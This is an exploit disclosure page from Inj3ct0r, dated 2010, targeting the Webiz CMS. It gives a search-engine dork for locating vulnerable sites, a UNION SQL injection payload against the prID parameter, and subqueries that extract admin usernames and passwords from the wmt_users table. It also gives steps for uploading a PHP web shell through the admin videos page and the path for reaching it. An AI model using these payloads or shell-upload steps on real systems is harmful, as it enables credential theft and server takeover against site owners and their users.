Webiz SQL Injection / SHELL Upload Vulnerability

Posted on 29 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Webiz SQL Injection / SHELL Upload Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================
Webiz SQL Injection / SHELL Upload Vulnerability
================================================

    ============================================================================
                                                     INFORMATIONS
    ============================================================================
    ==   Developers : www.webiz.gr
    ==   vulner     : SQL INJECTION
    ==   Bug        : ../wmt/webpages/index.php
    ==   Variable1  : &amp;prID=
    ==   Variable2  : &amp;apprec=
    ==
    ==   dork       : Powered by Webiz inurl:'wmt/webpages'
    ==
    ============================================================================
 
     
    ============================================================================
                                                           EXPLOIT
    ============================================================================
    ==
    ==  Dork     : Powered by Webiz inurl:'wmt/webpages'
    ==
    ==  URL      : ../wmt/webpages/index.php?lid=&amp;pid=&amp;prID=[Injection Here]
    ==
    ==  Demo    : http://localhost/wmt/webpages/index.php?lid=&amp;pid=&amp;prID=999.9'
    ==
    ==  exploit  : index.php?lid=&amp;pid=&amp;prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20--
    ==
    ==  database : MySQL 5
    ==
    ++
    ==
    ==  *** Insert This Code in THE VALID COLUMN ***
    ++               +
    ==  *** CHANGE [DATABASE_NAME] ***
    ==
    ==
    ==
    ==
    ==  USERNAME
    == 
    ==  (SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
    == 
    ==
    ==
    ==  USER PASSWORD
    == 
    == (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
    ==

==  -------------------------------------------
==  *** YOU MUST HAVE A ADMINISTRATOR RIGHT ***
==  -------------------------------------------
==
==  BUG
==  ../wmt/siteadmin/videos.php
==
==
==
==  PHP file Upload
== 
==
==
==  upload your shell from here
==  http://[localhost]/wmt/siteadmin/videos.php &gt;&gt; shell.php
==
==
==
==  Get it
==  http://[localhost]/wmt/userfiles/Media/videos/shell.php

    =============================================================================
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20